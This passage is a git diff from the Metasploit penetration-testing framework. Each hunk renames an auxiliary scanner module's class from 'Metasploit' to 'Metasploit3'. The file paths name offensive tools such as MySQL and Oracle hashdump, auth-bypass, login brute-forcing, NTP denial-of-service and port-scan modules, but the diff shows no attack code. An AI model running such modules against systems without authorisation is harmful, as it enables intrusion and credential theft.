a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb index 17f45c1975..9f0c275fd7 100644 --- a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb +++ b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/redis_server.rb b/modules/auxiliary/scanner/misc/redis_server.rb index e743a358b9..1dd600d8eb 100644 --- a/modules/auxiliary/scanner/misc/redis_server.rb +++ b/modules/auxiliary/scanner/misc/redis_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Module::Deprecated deprecated(Date.new(2016, 3, 5), 'auxiliary/scanner/redis/redis_server') diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index b454d354cb..e77aaa2c1e 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb index 8f06898feb..d52870235d 100644 --- a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb +++ b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index aeca6b8a79..04900cde94 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb index 31b6cf1a9e..3fbd8b36c1 100644 --- a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mongodb/mongodb_login.rb b/modules/auxiliary/scanner/mongodb/mongodb_login.rb index ac8c4ced34..e8091b4b1b 100644 --- a/modules/auxiliary/scanner/mongodb/mongodb_login.rb +++ b/modules/auxiliary/scanner/mongodb/mongodb_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index 113b2f6db2..525441c1c4 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/msf/msf_rpc_login.rb b/modules/auxiliary/scanner/msf/msf_rpc_login.rb index fff3ac4e67..1f3100ec96 100644 --- a/modules/auxiliary/scanner/msf/msf_rpc_login.rb +++ b/modules/auxiliary/scanner/msf/msf_rpc_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/msf/msf_web_login.rb b/modules/auxiliary/scanner/msf/msf_web_login.rb index 289cd5b899..28cacb64af 100644 --- a/modules/auxiliary/scanner/msf/msf_web_login.rb +++ b/modules/auxiliary/scanner/msf/msf_web_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 40078ffa58..5180dc687f 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index c3577dc00c..6c07f9f3b8 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mssql' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb index 16d2386be1..12078e523a 100644 --- a/modules/auxiliary/scanner/mssql/mssql_ping.rb +++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 6f91229193..628a8fdb86 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'yaml' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index 5e2fb28ff9..bcb1234c20 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 7660c7da6f..f5b6bdbe5c 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'yaml' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index e0675179c8..ce7c378756 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index 618777b721..97658016c6 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mysql' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb index cd8aa10f86..ede601b57e 100644 --- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'yaml' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb index c7b7769ca3..bde7d5c2b7 100644 --- a/modules/auxiliary/scanner/mysql/mysql_version.rb +++ b/modules/auxiliary/scanner/mysql/mysql_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb index 0170e22244..5c21a67f68 100644 --- a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb +++ b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb index b6dcd860e7..ba12f61143 100644 --- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb index 4d2fa5243c..88aef9dc9b 100644 --- a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/nessus' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb index 6c044c8dc3..e687f70ddf 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb index cfd0a71019..412c93108b 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/netbios/nbname.rb b/modules/auxiliary/scanner/netbios/nbname.rb index 78019a0f92..64b9befe91 100644 --- a/modules/auxiliary/scanner/netbios/nbname.rb +++ b/modules/auxiliary/scanner/netbios/nbname.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/netbios/nbname_probe.rb b/modules/auxiliary/scanner/netbios/nbname_probe.rb index 68ad6a9761..fe990c8685 100644 --- a/modules/auxiliary/scanner/netbios/nbname_probe.rb +++ b/modules/auxiliary/scanner/netbios/nbname_probe.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb index 085517a5fa..0953d09cec 100644 --- a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb +++ b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index efa9867238..fd2aee0706 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index c74f3c019d..ba17c40926 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb index eb07a92d1c..104e73a527 100644 --- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb +++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index 8795533dfa..c2d7653db8 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index dc2293886e..900c9b7fad 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index da1a4cb989..98cb2a0d4c 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index ec3049f5f1..f31ee5f258 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index c8e9a3901d..eb4ebbc44a 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index d966e403cf..9913e40b1c 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb index c9ab8d1e37..0d0e0d3916 100644 --- a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb index 171a21853f..c778ba15ca 100644 --- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb index 65401e01c9..fbf870fb2d 100644 --- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index 85bc01b40a..f72286bd28 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index 1717b861cd..fa717b7ec0 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index 11a895ac50..e3ba450180 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb index 2b27b12199..c3a0442d33 100644 --- a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb +++ b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/oracle_login.rb b/modules/auxiliary/scanner/oracle/oracle_login.rb index 12cd2fd5ab..b733440c72 100644 --- a/modules/auxiliary/scanner/oracle/oracle_login.rb +++ b/modules/auxiliary/scanner/oracle/oracle_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Nmap diff --git a/modules/auxiliary/scanner/oracle/sid_brute.rb b/modules/auxiliary/scanner/oracle/sid_brute.rb index cc6453c83e..a61284d5fd 100644 --- a/modules/auxiliary/scanner/oracle/sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TNS include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index 8eea7f3401..7b24a42b36 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TNS include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index 902e078b0c..3b740f7643 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index 36bb2e93ed..3bd78c1437 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index dcad8d2225..aab795941c 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index ff5ce4ad87..c07928617e 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index 520afffab2..8fe5687b47 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb index c66b9258f7..d787bf7863 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb @@ -5,7 +5,7 @@ require 'msf/core/exploit/tcp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb index db215a0994..ab83d9191d 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb index fcbaa9f2f0..693c294945 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/pop3/pop3_login.rb b/modules/auxiliary/scanner/pop3/pop3_login.rb index 877edec755..98ae8f9257 100644 --- a/modules/auxiliary/scanner/pop3/pop3_login.rb +++ b/modules/auxiliary/scanner/pop3/pop3_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/pop3' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index 8d3c33721f..ff3d1828c2 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/portmap/portmap_amp.rb b/modules/auxiliary/scanner/portmap/portmap_amp.rb index 04bcd83b10..abc7f8ca76 100644 --- a/modules/auxiliary/scanner/portmap/portmap_amp.rb +++ b/modules/auxiliary/scanner/portmap/portmap_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index c72ca3c064..e020120a0e 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb b/modules/auxiliary/scanner/portscan/ftpbounce.rb index 3616698c3c..d84256ff30 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary 